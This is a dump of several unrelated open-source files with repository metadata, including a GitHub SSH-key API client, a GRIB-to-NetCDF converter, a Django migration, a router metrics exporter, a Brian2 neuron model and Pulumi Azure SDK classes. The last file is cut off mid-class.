] | permissive | srinivasreddy/allhub | ccebea96a106e266743d180410ab5b16d08946fe | ff20858c9984da5c4edd5043c39eed3b6d5d693d | refs/heads/master | 2022-12-27T01:24:30.759553 | 2021-06-04T11:38:16 | 2021-06-04T11:38:16 | 204,402,796 | 2 | 2 | Apache-2.0 | 2022-12-08T07:44:11 | 2019-08-26T05:33:37 | Python | UTF-8 | Python | false | false | 1,817 | py | from allhub.response import Response
class SSHKeysMixin:
def list_public_ssh_keys(self, username):
url = "/users/{username}/keys".format(username=username)
self.response = Response(
self.get(
url,
**{"Accept": "application/vnd.github.giant-sentry-fist-preview+json"},
),
"SSHKeys",
)
return self.response.transform()
def ssh_keys(self):
url = "/user/keys"
self.response = Response(
self.get(
url,
**{"Accept": "application/vnd.github.giant-sentry-fist-preview+json"},
),
"SSHKeys",
)
return self.response.transform()
def ssh_key(self, key_id):
url = "/user/keys/{key_id}".format(key_id=key_id)
self.response = Response(
self.get(
url,
**{"Accept": "application/vnd.github.giant-sentry-fist-preview+json"},
),
"SSHKey",
)
return self.response.transform()
def create_public_ssh_key(self, title, key):
url = "/user/keys"
self.response = Response(
self.post(
url,
params=[("title", title), ("key", key)],
**{"Accept": "application/vnd.github.giant-sentry-fist-preview+json"},
),
"SSHKey",
)
return self.response.transform()
def delete_public_ssh_key(self, key_id):
url = "/user/keys/{key_id}".format(key_id=key_id)
self.response = Response(
self.delete(
url,
**{"Accept": "application/vnd.github.giant-sentry-fist-preview+json"},
),
"",
)
return self.response.status_code == 204
| [
"thatiparthysreenivas@gmail.com"
] | thatiparthysreenivas@gmail.com |
6700ce49e60619ee0fb43f9763634b80fea881da | 8cc9cd57502d7b05e7efab28f1a67e49f3880435 | /bin/emacs-pylint.py | c820de6afb0b234d35a9e15f0f0ea2a228b48997 | [
"MIT"
] | permissive | mrflip/dotfiles | 271483b50a2d622bd763c9548e834c10ab5571c7 | 50ad0da829f7734dbda5a7ab79638a1dae647fec | refs/heads/master | 2020-12-25T09:48:17.086879 | 2020-07-27T04:18:58 | 2020-07-27T04:18:58 | 45,720 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | #!/usr/bin/env python
import re
import sys
from subprocess import *
p = Popen("pylint -f parseable -r n --disable-msg-cat=C,R %s" %
sys.argv[1], shell = True, stdout = PIPE).stdout
for line in p:
match = re.search("\\[([WE])(, (.+?))?\\]", line)
if match:
kind = match.group(1)
func = match.group(3)
if kind == "W":
msg = "Warning"
else:
msg = "Error"
if func:
line = re.sub("\\[([WE])(, (.+?))?\\]", "%s (%s):" % (msg, func), line)
else:
line = re.sub("\\[([WE])?\\]", "%s:" % msg, line)
print line,
p.close()
| [
"doncarlo@silverback.local"
] | doncarlo@silverback.local |
78a6927b9d7a4ea485f4cff1587b6097a2e634ee | 461da7a58c559c8710972c2ed3e34f558bf5d77d | /dmic/grib2nc.py | 441b5962c0427363b5c7584ec4f38ea2713fa647 | [
"MIT"
] | permissive | khintz/dmic | 94ce46daaa05552094480e573be60a43dbe15022 | 147a307d89c22f9ed335a7c617e668194e13257e | refs/heads/master | 2022-12-24T15:43:02.790499 | 2020-10-01T19:55:17 | 2020-10-01T19:55:17 | 300,038,055 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,111 | py | import sys
import os
import dmit
import xarray as xr
import configparser
import netCDF4 as nc
import numpy as np
import grib
import logging
log = logging.getLogger("dmic.log")
log.setLevel(logging.DEBUG)
b_t2m = False
b_u10 = False
b_v10 = False
class convert:
def __init__(self, gribfile, leveltype, outfile):
if leveltype=='sf':
ini_grib = grib.cf_grib_definitions.gribparameter2cfnaming_sf
else:
log.error('Sorry! But '+leveltype+' is not implemented yet')
log.error('Possible options for --leveltype is: sf\n exiting')
sys.exit(0)
# Call object
grib_reader = grib.read(leveltype)
# Get coordinates
lats, lons, latdim, londim = grib_reader.get_grid(gribfile)
# we have to divide calls to grib_reader.read() between same parameter, multiple levels OR
# multiple parameters, same level.
grib_dic = {}
for key in ini_grib:
keylist = key.split('_')
lvl = str(keylist[1])
if lvl not in grib_dic.keys():
grib_dic[lvl] = {}
grib_dic[lvl][key] = ini_grib[key]
# This works but creates NaN for all values with missing level (eg parid 33 does not have values at level 2)
i=0
for key in grib_dic.keys():
ds_grib = grib_reader.read(gribfile, leveltype, grib_dic[key])
# if i==0: ds = ds_grib
# if i>0: ds = xr.merge([x, ds_grib])
# x = ds_grib
i+=1
coord_names = list(ds_grib.coords)
dim_names = list(ds_grib.dims)
var_names = list(ds_grib.data_vars)
k=0
for var in var_names:
level = ds_grib[var].coords['level'].values[0]
if var == 'air_temperature' and level==2:
b_t2m = True
t2m = np.array(ds_grib[var].values, dtype=np.float32)
if var == 'eastward_wind' and level==10:
b_u10 = True
u10 = np.array(ds_grib[var].values, dtype=np.float32)
if var == 'northward_wind' and level==10:
b_v10 = True
v10 = np.array(ds_grib[var].values, dtype=np.float32)
k+=1
ncf = nc.Dataset(outfile,'w')
ncdim_time = ncf.createDimension("time", None)
ncdim_lat = ncf.createDimension("latitude", latdim)
ncdim_lon = ncf.createDimension("longitude", londim)
# 'f4' = float (ordinary, bot python float which is 64bit)
# 'i4' = "i4" represents a 32 bit integer
if b_t2m:
ncvar_t2m = ncf.createVariable('air_temperature_2m', 'f4', ('time','latitude','longitude'), zlib=True)
ncvar_t2m[:,:,:] = t2m[:,0,:,:]
ncvar_t2m.units = 'K'
ncvar_t2m.long_name = 'air_temperature_2m'
if b_u10:
ncvar_u10 = ncf.createVariable('eastward_wind_10m', 'f4', ('time','latitude','longitude'), zlib=True)
ncvar_u10[:,:,:] = u10[:,0,:,:]
ncvar_u10.units = 'm/s'
ncvar_u10.long_name = 'eastward_wind_10m'
if b_v10:
ncvar_v10 = ncf.createVariable('nortward_wind_10m', 'f4', ('time','latitude','longitude'), zlib=True)
ncvar_v10[:,:,:] = v10[:,0,:,:]
ncvar_v10.units = 'm/s'
ncvar_v10.long_name = 'nortward_wind_10m'
ncf.close()
# ds.to_netcdf(outfile)
# Read gribfile
# ds_grib = grib_reader.read(gribfile, leveltype, grib_dic)
# print(ds_grib)
# i = 0
# for key in grib_dic.keys():
# ds_grib = grib_reader.read(gribfile, leveltype, grib_dic[key])
# ds_grib.to_netcdf(outfile+'.'+str(i))
# i+=1
# if i==0: # For first iteration we create the netcdf file
# ncf = nc.Dataset('out.nc','w')
# ncdim_time = ncf.createDimension("TIME", None)
return
| [
"kasperhintz@gmail.com"
] | kasperhintz@gmail.com |
e08f516bcebbb47311c2d452292f7c848b0dbe99 | 475ddb908382a253fcfe14b0ccb74b6bd18493eb | /aui/migrations/0001_initial.py | 9f3393cbf6352b31a34f3199d51e87778950ac63 | [] | no_license | malayparmar8991/DRF-Task | 0c77b324f6862d40d7e6164e322d424083496ea3 | 03f1604eb3b281430eb897c80d8a0cd874a4adae | refs/heads/main | 2023-02-05T18:30:15.061473 | 2020-12-24T09:38:52 | 2020-12-24T09:38:52 | 324,116,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,912 | py | # Generated by Django 3.1.4 on 2020-12-23 21:04
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Users',
fields=[
('user_id', models.CharField(default=0, max_length=10, unique=True)),
('Aadhar_Number', models.IntegerField(default=0, primary_key=True, serialize=False, unique=True)),
('Is_Active', models.BooleanField()),
('street', models.CharField(max_length=100, null=True)),
('city', models.CharField(max_length=10, null=True)),
('state', models.CharField(max_length=10, null=True)),
('Postal_Code', models.IntegerField(null=True)),
('School_or_College_name', models.CharField(max_length=100)),
('Year_of_Passing', models.IntegerField()),
('percentage', models.FloatField()),
('Account_Number', models.IntegerField()),
('Bank_Name', models.CharField(max_length=100)),
('IFSC_Code', models.IntegerField(unique=True)),
('Full_Name', models.CharField(max_length=100)),
('Date_of_birth', models.DateField()),
('Blood_Group', models.CharField(max_length=100)),
('Contact_Number_1', models.IntegerField()),
('Contact_Number_2', models.IntegerField(blank=True, null=True)),
('Email_ID_1', models.EmailField(max_length=254)),
('Email_ID_2', models.EmailField(blank=True, max_length=254, null=True)),
('Company_Name', models.CharField(max_length=100)),
('Job_Role', models.CharField(max_length=100)),
('Work_Experience_in_Years', models.IntegerField()),
],
),
]
| [
"parmarmalay8991@gmail.com"
] | parmarmalay8991@gmail.com |
d482c06463915558c4276198ec9aa13a4222ad08 | d59913246a2faa24779daf6713a863ee4319ddba | /flappyBird.py | dbd4e55c0ac50fd2d827d3976cbc39001df6d15f | [] | no_license | andypro22/Asteroids | 184ebd7f8d7a30ff4f30f3e9bfd79fda20547a4e | 5ef4fbdc85b2963fd7e2a7e96eb151e8dd1258e5 | refs/heads/main | 2023-06-27T07:12:25.910216 | 2021-07-29T09:18:02 | 2021-07-29T09:18:02 | 390,663,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | # Importing the extensions
import pygame
# Initializing the pygame
pygame.init()
# Creating the screen
screen = pygame.display.set_mode((800, 600))
# Title and Icon
pygame.display.set_caption('Asteroids')
icon = pygame.image.load('')
# Game Loop
running = True
while running:
# Events
for event in pygame.event.get():
# Quitting
if event.type == pygame.QUIT:
running = False
| [
"andyngpro22@gmail.com"
] | andyngpro22@gmail.com |
0b2aa37456c58d7cc431f4a0878d8f13aa3afdaf | 7254b888214be18434ec20ff8f1f734ee56dcc44 | /keentic_influxdb_exporter.py | f1569752c51be1a2df1562aba7f434cc9fb3a29a | [] | no_license | easterism/keenetic-grafana-monitoring | 4c5ba9eda6d1ab6df63280512627d9cec2e08bb8 | 16e3c37bf8c5531439faf1033c762c24993bb2c8 | refs/heads/master | 2022-11-30T14:16:08.348802 | 2020-08-03T16:26:24 | 2020-08-03T16:26:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,196 | py | import json
import os
import time
import urllib
import requests
from jsonpath_rw import parse
from influxdb_writter import InfuxWritter
from value_normalizer import normalize_value
def json_path_init(paths):
queries = {}
for pathName, path in paths.items():
if path == "~":
queries[pathName] = path
else:
queries[pathName] = parse(path)
return queries
class KeeneticCollector(object):
def __init__(self, infuxdb_writter, endpoint, metric_configration):
self._influx = infuxdb_writter
self._endpoint = endpoint
self._command = metric_configration['command']
self._params = metric_configration.get('param', {})
self._root = parse(metric_configration['root'])
self._tags = json_path_init(metric_configration['tags'])
self._values = json_path_init(metric_configration['values'])
def collect(self):
url = '{}/show/{}'.format(self._endpoint, self._command.replace(' ', '/')) + "?" + urllib.parse.urlencode(
self._params)
response = json.loads(requests.get(url).content.decode('UTF-8'))
roots = self._root.find(response)
metrics = []
start_time = time.time_ns()
for root in roots:
tags = self._params.copy()
values = {}
for tagName, tagPath in self._tags.items():
if tagPath == '~':
tags[tagName] = root.path.fields[0]
else:
tags[tagName] = self.get_first_value(tagPath.find(root.value))
for valueName, valuePath in self._values.items():
value = self.get_first_value(valuePath.find(root.value))
if value is not None: values[valueName] = normalize_value(value)
if values.__len__() == 0: continue
metric = self.create_metric(self._command, tags, values)
# print(json.dumps(metric))
metrics.append(metric)
metrics.append(
self.create_metric("collector", {"command": self._command}, {"duration": (time.time_ns() - start_time)}))
infuxdb_writter.write_metrics(metrics)
@staticmethod
def create_metric(measurement, tags, values):
return {
"measurement": measurement,
"tags": tags,
"time": time.time_ns(),
"fields": values
}
@staticmethod
def get_first_value(array):
if array and len(array) > 0:
return array[0].value
else:
return None
if __name__ == '__main__':
print(
" _ __ _ _ _____ _ _ _ \n | |/ / | | (_) / ____| | | | | | \n | ' / ___ ___ _ __ ___| |_ _ ___ | | ___ | | | ___ ___| |_ ___ _ __ \n | < / _ \/ _ \ '_ \ / _ \ __| |/ __| | | / _ \| | |/ _ \/ __| __/ _ \| '__|\n | . \ __/ __/ | | | __/ |_| | (__ | |___| (_) | | | __/ (__| || (_) | | \n |_|\_\___|\___|_| |_|\___|\__|_|\___| \_____\___/|_|_|\___|\___|\__\___/|_| \n \n ")
metrics_configuration = json.load(open(os.path.dirname(os.path.realpath(__file__)) + "/config/metrics.json", "r"))
influx_configuration = json.load(open(os.path.dirname(os.path.realpath(__file__)) + "/config/influx.json", "r"))
endpoint = metrics_configuration['endpoint']
metrics = metrics_configuration['metrics']
collectors = []
infuxdb_writter = InfuxWritter(influx_configuration)
print("Connecting to router: " + endpoint)
for metric_configuration in metrics:
print("Configuring metric: " + metric_configuration['command'])
collectors.append(KeeneticCollector(infuxdb_writter, endpoint, metric_configuration))
print("Configuration done. Start collecting with interval: " + str(metrics_configuration['interval_sec']) + " sec")
while True:
for collector in collectors: collector.collect()
time.sleep(metrics_configuration['interval_sec'])
| [
"vitalikis1@gmail.com"
] | vitalikis1@gmail.com |
e0159a0bc43cebe51ee88486e5e5cacadec5a5a7 | 9edaf93c833ba90ae9a903aa3c44c407a7e55198 | /netex/models/railway_link_ref_structure.py | 00ba98f8df1e4547deb46e2b051c3da101b80055 | [] | no_license | tefra/xsdata-samples | c50aab4828b8c7c4448dbdab9c67d1ebc519e292 | ef027fe02e6a075d8ed676c86a80e9647d944571 | refs/heads/main | 2023-08-14T10:31:12.152696 | 2023-07-25T18:01:22 | 2023-07-25T18:01:22 | 222,543,692 | 6 | 1 | null | 2023-06-25T07:21:04 | 2019-11-18T21:00:37 | Python | UTF-8 | Python | false | false | 246 | py | from dataclasses import dataclass
from .infrastructure_link_ref_structure import InfrastructureLinkRefStructure
__NAMESPACE__ = "http://www.netex.org.uk/netex"
@dataclass
class RailwayLinkRefStructure(InfrastructureLinkRefStructure):
pass
| [
"chris@komposta.net"
] | chris@komposta.net |
f0b8215f223b8f5f0e4e37e04cf9da5319bc58df | 86d13acd9daa4c86384306f19247bbc49a903302 | /run.py | 1190fb251aa7e2a2244485758b35f99deb01168e | [] | no_license | Aaronator1/microblog3 | 2dfa2ab8ef2dc6f6d848cef954c538514c88d8ae | 12c3682f230b14a7117c184463034bf288204c7b | refs/heads/master | 2016-09-01T15:31:54.779725 | 2015-11-27T22:08:36 | 2015-11-27T22:08:36 | 46,994,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | __author__ = 'aaronmsmith'
#!flask/bin/python
from app import app
app.run(debug=True)
| [
"aaron.smith@healthways.com"
] | aaron.smith@healthways.com |
b18f821ccaffcada21e37d3d9d6043914b8a0290 | 5f0fed47f9dd3d918eb5f32f7b7d55097762c522 | /findMiddleElement.py | dca42e660a2f22cedebd6d1007dd83b328170cef | [] | no_license | NoisNette/Codesignal-solutions | 20431c3ebb3f38eed2f6b20a001824c96c0dff23 | 496c4ec9e6f334c07358df3257d3a85285488053 | refs/heads/master | 2021-05-24T12:11:59.578709 | 2021-02-05T15:55:32 | 2021-02-05T15:55:32 | 253,553,945 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | def findMiddleElement(l):
l1 = []
while l!=None:
l1.append(l.value)
l = l.next
return l1[len(l1)//2]
| [
"noreply@github.com"
] | NoisNette.noreply@github.com |
ec926de0354a852e7beb4470bfacb19eed09d694 | f93ce0ace9cdfd117d5b725626f4b808f2e26c23 | /python3/sys-module/f5.py | 3695587fa8c405c15e841a1928b106a18a46a63d | [] | no_license | DhritiShikhar/my-code | 90be74a5d74c3cea20324b481972da4e4c4e585d | ded31babce1b3c1eb7699c70a81a6fe50c60c6bb | refs/heads/master | 2021-01-20T08:00:17.792809 | 2015-06-10T16:37:12 | 2015-06-10T16:37:12 | 37,109,407 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | #!/usr/bin/python3
import sys
save_stdout = sys.stdout
my_file = open("test", "w")
sys.stdout = my_file
print ("This line goes to my_file")
sys.stdout = save_stdout
my_file.close()
| [
"dhrish20@gmail.com"
] | dhrish20@gmail.com |
6d608921210b60fa6848d362d756532953b5c228 | 2b770588db83bc2a61b52f430248414395cc1b1f | /django_/citysearch_project/cities/models.py | fa4d0dc5e09ad2f0c02245c2ca01b266a2024625 | [] | no_license | luka319/portfelio_chemodanio | 595afb1d2e1fb3564bf94b204aa8e63dddd4cf0c | dd37f8c4af9d043ace9b5438b5a7680cfab26ab2 | refs/heads/master | 2021-06-26T19:05:33.170977 | 2020-01-08T23:24:10 | 2020-01-08T23:24:10 | 231,444,932 | 0 | 0 | null | 2021-06-10T22:27:34 | 2020-01-02T19:19:49 | Python | UTF-8 | Python | false | false | 296 | py | from django.db import models
# Create your models here.
class City(models.Model):
name = models.CharField(max_length = 255)
state = models.CharField(max_length = 255)
class Meta:
verbose_name_plural = "cities_города"
def __str__(self):
return self.name
| [
"luka319@i.ua"
] | luka319@i.ua |
984cd002eab77602f376c87e7f320dc1d8d297fb | c79226a0b149150072a5eb3037a3859ca7df937f | /cells/FS_LIP_altd.py | 27b30c3056511f8defe03f1233f44740f5839794 | [
"MIT"
] | permissive | benpolletta/egly-driver-network | e880c2161635a556d7324f5ca2c137bbf4dbcd8a | cff36a857e22358d122f24fb0100be26483a3caf | refs/heads/main | 2023-04-12T13:28:46.106592 | 2021-04-06T15:58:09 | 2021-04-06T16:03:12 | 355,248,088 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,718 | py | # -*- coding: utf-8 -*-
from brian2 import *
defaultclock.dt = 0.01*ms
eq_FS_LIP='''
dV/dt=1/C_FS*(-J-Isyn-Igap-Iran-Iapp-IL-INa-IK) : volt
J : amp * meter ** -2
Isyn=IsynRS_LIP_sup+IsynFS_LIP_sup+IsynSI_LIP_sup+IsynRS_LIP_gran+IsynFS_LIP_gran+IsynIB_LIP+IsynSI_LIP_deep+Isyn_FEF+Isyn_mdPul : amp * meter ** -2
IsynRS_LIP_sup : amp * meter ** -2
IsynFS_LIP_sup : amp * meter ** -2
IsynSI_LIP_sup : amp * meter ** -2
IsynRS_LIP_gran : amp * meter ** -2
IsynFS_LIP_gran : amp * meter ** -2
IsynIB_LIP : amp * meter ** -2
IsynSI_LIP_deep : amp * meter ** -2
Isyn_FEF : amp * meter ** -2
Isyn_mdPul : amp * meter ** -2
Igap : amp * meter ** -2
IL=gL_FS*(V-VL_FS) : amp * meter ** -2
INa=gNa_FS*m0**3*h*(V-VNa_FS) : amp * meter ** -2
m0=1/(1+exp((-V-38*mV)/10/mV)) : 1
dh/dt=1/tauh*(hinf-h) : 1
hinf=1/(1+exp((V+58.3*mV)/6.7/mV)) : 1
tauh=0.225*ms+1.125*ms/(1+exp((V+37*mV)/15/mV)) : second
IK=gK_FS*m**4*(V-VK_FS) : amp * meter ** -2
dm/dt=1/taum*(minf-m) : 1
minf=1/(1+exp((-V-27*mV)/11.5/mV)) : 1
taum=0.25*ms+4.35*ms*exp(-abs(V+10*mV)/10/mV) : second
Iran=sig_ranFS*randn(): amp * meter ** -2 (constant over dt)
Iapp=sinp*ginp_FS*(V-Vrev_inp) : amp * meter ** -2
dsinp/dt=-sinp/taudinp + (1-sinp)/taurinp*0.5*(1+tanh(Vinp/10/mV)) : 1
dVinp/dt=1/tauinp*(Vlow-Vinp) : volt
ginp_FS = ginp_FS_good* (1+sin(2*pi*t*4*Hz)): siemens * meter **-2
ginp_FS_good : siemens * meter **-2
ginp_FS_bad : siemens * meter **-2
'''
##Constants :
C_FS = 0.9* ufarad * cm ** -2
gL_FS=1 * msiemens * cm **-2
VL_FS=-65*mV
gNa_FS=200 * msiemens * cm **-2
VNa_FS=50*mV
gK_FS=20 * msiemens * cm **-2
VK_FS=-100*mV
sig_ranFS=0.05* mamp * cm **-2
sig_ranFS=0.05* mamp * cm **-2*0.5
if __name__=='__main__' :
start_scope()
Vrev_inp=0*mV
taurinp=0.1*ms
taudinp=0.5*ms
tauinp=taudinp
Vhigh=0*mV
Vlow=-80*mV
ginp_IB=0* msiemens * cm **-2
ginp=0* msiemens * cm **-2
FS=NeuronGroup(1,eq_FS_LIP,threshold='V>-20*mvolt',refractory=3*ms,method='rk4')
FS.V = '-110*mvolt+10*rand()*mvolt'
FS.h = '0+0.05*rand()'
FS.m = '0+0.05*rand()'
FS.J='5 * uA * cmeter ** -2'
V1=StateMonitor(FS,'V',record=[0])
# I1=StateMonitor(FS,'IL',record=[0])
# I2=StateMonitor(FS,'INa',record=[0])
# I3=StateMonitor(FS,'IK',record=[0])
run(1*second)
figure()
plot(V1.t/second,V1.V[0]/volt)
xlabel('Time (s)')
ylabel('Membrane potential (V)')
title('FS cell')
# figure()
# plot(I1.t/second,I1.IL[0],label='L')
# plot(I1.t/second,I2.INa[0],label='Na')
# plot(I1.t/second,I3.IK[0],label='K')
# plot(I1.t/second,I4.IAR[0],label='AR')
# title('Synaptic currents')
# legend() | [
"benpolletta@gmail.com"
] | benpolletta@gmail.com |
802828ec5275a0ef9b1ef8d1db094dfc9f3a6d36 | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/alertsmanagement/v20190505preview/outputs.py | 0da651342e6335cb50f421cf750b9e602f4b1fea | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,016 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
__all__ = [
'ActionGroupResponse',
'ConditionResponse',
'ConditionsResponse',
'DiagnosticsResponse',
'ScopeResponse',
'SuppressionConfigResponse',
'SuppressionResponse',
'SuppressionScheduleResponse',
]
@pulumi.output_type
class ActionGroupResponse(dict):
"""
Action rule with action group configuration
"""
def __init__(__self__, *,
action_group_id: str,
created_at: str,
created_by: str,
last_modified_at: str,
last_modified_by: str,
type: str,
conditions: Optional['outputs.ConditionsResponse'] = None,
description: Optional[str] = None,
scope: Optional['outputs.ScopeResponse'] = None,
status: Optional[str] = None):
"""
Action rule with action group configuration
:param str action_group_id: Action group to trigger if action rule matches
:param str created_at: Creation time of action rule. Date-Time in ISO-8601 format.
:param str created_by: Created by user name.
:param str last_modified_at: Last updated time of action rule. Date-Time in ISO-8601 format.
:param str last_modified_by: Last modified by user name.
:param str type: Indicates type of action rule
Expected value is 'ActionGroup'.
:param 'ConditionsResponseArgs' conditions: conditions on which alerts will be filtered
:param str description: Description of action rule
:param 'ScopeResponseArgs' scope: scope on which action rule will apply
:param str status: Indicates if the given action rule is enabled or disabled
"""
pulumi.set(__self__, "action_group_id", action_group_id)
pulumi.set(__self__, "created_at", created_at)
pulumi.set(__self__, "created_by", created_by)
pulumi.set(__self__, "last_modified_at", last_modified_at)
pulumi.set(__self__, "last_modified_by", last_modified_by)
pulumi.set(__self__, "type", 'ActionGroup')
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if description is not None:
pulumi.set(__self__, "description", description)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter(name="actionGroupId")
def action_group_id(self) -> str:
"""
Action group to trigger if action rule matches
"""
return pulumi.get(self, "action_group_id")
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> str:
"""
Creation time of action rule. Date-Time in ISO-8601 format.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter(name="createdBy")
def created_by(self) -> str:
"""
Created by user name.
"""
return pulumi.get(self, "created_by")
@property
@pulumi.getter(name="lastModifiedAt")
def last_modified_at(self) -> str:
"""
Last updated time of action rule. Date-Time in ISO-8601 format.
"""
return pulumi.get(self, "last_modified_at")
@property
@pulumi.getter(name="lastModifiedBy")
def last_modified_by(self) -> str:
"""
Last modified by user name.
"""
return pulumi.get(self, "last_modified_by")
@property
@pulumi.getter
def type(self) -> str:
"""
Indicates type of action rule
Expected value is 'ActionGroup'.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def conditions(self) -> Optional['outputs.ConditionsResponse']:
"""
conditions on which alerts will be filtered
"""
return pulumi.get(self, "conditions")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
Description of action rule
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def scope(self) -> Optional['outputs.ScopeResponse']:
"""
scope on which action rule will apply
"""
return pulumi.get(self, "scope")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
Indicates if the given action rule is enabled or disabled
"""
return pulumi.get(self, "status")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ConditionResponse(dict):
"""
condition to trigger an action rule
"""
def __init__(__self__, *,
operator: Optional[str] = None,
values: Optional[Sequence[str]] = None):
"""
condition to trigger an action rule
:param str operator: operator for a given condition
:param Sequence[str] values: list of values to match for a given condition.
"""
if operator is not None:
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def operator(self) -> Optional[str]:
"""
operator for a given condition
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
list of values to match for a given condition.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ConditionsResponse(dict):
"""
Conditions in alert instance to be matched for a given action rule. Default value is all. Multiple values could be provided with comma separation.
"""
def __init__(__self__, *,
alert_context: Optional['outputs.ConditionResponse'] = None,
alert_rule_id: Optional['outputs.ConditionResponse'] = None,
description: Optional['outputs.ConditionResponse'] = None,
monitor_condition: Optional['outputs.ConditionResponse'] = None,
monitor_service: Optional['outputs.ConditionResponse'] = None,
severity: Optional['outputs.ConditionResponse'] = None,
target_resource_type: Optional['outputs.ConditionResponse'] = None):
"""
Conditions in alert instance to be matched for a given action rule. Default value is all. Multiple values could be provided with comma separation.
:param 'ConditionResponseArgs' alert_context: filter alerts by alert context (payload)
:param 'ConditionResponseArgs' alert_rule_id: filter alerts by alert rule id
:param 'ConditionResponseArgs' description: filter alerts by alert rule description
:param 'ConditionResponseArgs' monitor_condition: filter alerts by monitor condition
:param 'ConditionResponseArgs' monitor_service: filter alerts by monitor service
:param 'ConditionResponseArgs' severity: filter alerts by severity
:param 'ConditionResponseArgs' target_resource_type: filter alerts by target resource type
"""
if alert_context is not None:
pulumi.set(__self__, "alert_context", alert_context)
if alert_rule_id is not None:
pulumi.set(__self__, "alert_rule_id", alert_rule_id)
if description is not None:
pulumi.set(__self__, "description", description)
if monitor_condition is not None:
pulumi.set(__self__, "monitor_condition", monitor_condition)
if monitor_service is not None:
pulumi.set(__self__, "monitor_service", monitor_service)
if severity is not None:
pulumi.set(__self__, "severity", severity)
if target_resource_type is not None:
pulumi.set(__self__, "target_resource_type", target_resource_type)
@property
@pulumi.getter(name="alertContext")
def alert_context(self) -> Optional['outputs.ConditionResponse']:
"""
filter alerts by alert context (payload)
"""
return pulumi.get(self, "alert_context")
@property
@pulumi.getter(name="alertRuleId")
def alert_rule_id(self) -> Optional['outputs.ConditionResponse']:
"""
filter alerts by alert rule id
"""
return pulumi.get(self, "alert_rule_id")
@property
@pulumi.getter
def description(self) -> Optional['outputs.ConditionResponse']:
"""
filter alerts by alert rule description
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="monitorCondition")
def monitor_condition(self) -> Optional['outputs.ConditionResponse']:
"""
filter alerts by monitor condition
"""
return pulumi.get(self, "monitor_condition")
@property
@pulumi.getter(name="monitorService")
def monitor_service(self) -> Optional['outputs.ConditionResponse']:
"""
filter alerts by monitor service
"""
return pulumi.get(self, "monitor_service")
@property
@pulumi.getter
def severity(self) -> Optional['outputs.ConditionResponse']:
"""
filter alerts by severity
"""
return pulumi.get(self, "severity")
@property
@pulumi.getter(name="targetResourceType")
def target_resource_type(self) -> Optional['outputs.ConditionResponse']:
"""
filter alerts by target resource type
"""
return pulumi.get(self, "target_resource_type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class DiagnosticsResponse(dict):
"""
Action rule with diagnostics configuration
"""
def __init__(__self__, *,
created_at: str,
created_by: str,
last_modified_at: str,
last_modified_by: str,
type: str,
conditions: Optional['outputs.ConditionsResponse'] = None,
description: Optional[str] = None,
scope: Optional['outputs.ScopeResponse'] = None,
status: Optional[str] = None):
"""
Action rule with diagnostics configuration
:param str created_at: Creation time of action rule. Date-Time in ISO-8601 format.
:param str created_by: Created by user name.
:param str last_modified_at: Last updated time of action rule. Date-Time in ISO-8601 format.
:param str last_modified_by: Last modified by user name.
:param str type: Indicates type of action rule
Expected value is 'Diagnostics'.
:param 'ConditionsResponseArgs' conditions: conditions on which alerts will be filtered
:param str description: Description of action rule
:param 'ScopeResponseArgs' scope: scope on which action rule will apply
:param str status: Indicates if the given action rule is enabled or disabled
"""
pulumi.set(__self__, "created_at", created_at)
pulumi.set(__self__, "created_by", created_by)
pulumi.set(__self__, "last_modified_at", last_modified_at)
pulumi.set(__self__, "last_modified_by", last_modified_by)
pulumi.set(__self__, "type", 'Diagnostics')
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if description is not None:
pulumi.set(__self__, "description", description)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> str:
"""
Creation time of action rule. Date-Time in ISO-8601 format.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter(name="createdBy")
def created_by(self) -> str:
"""
Created by user name.
"""
return pulumi.get(self, "created_by")
@property
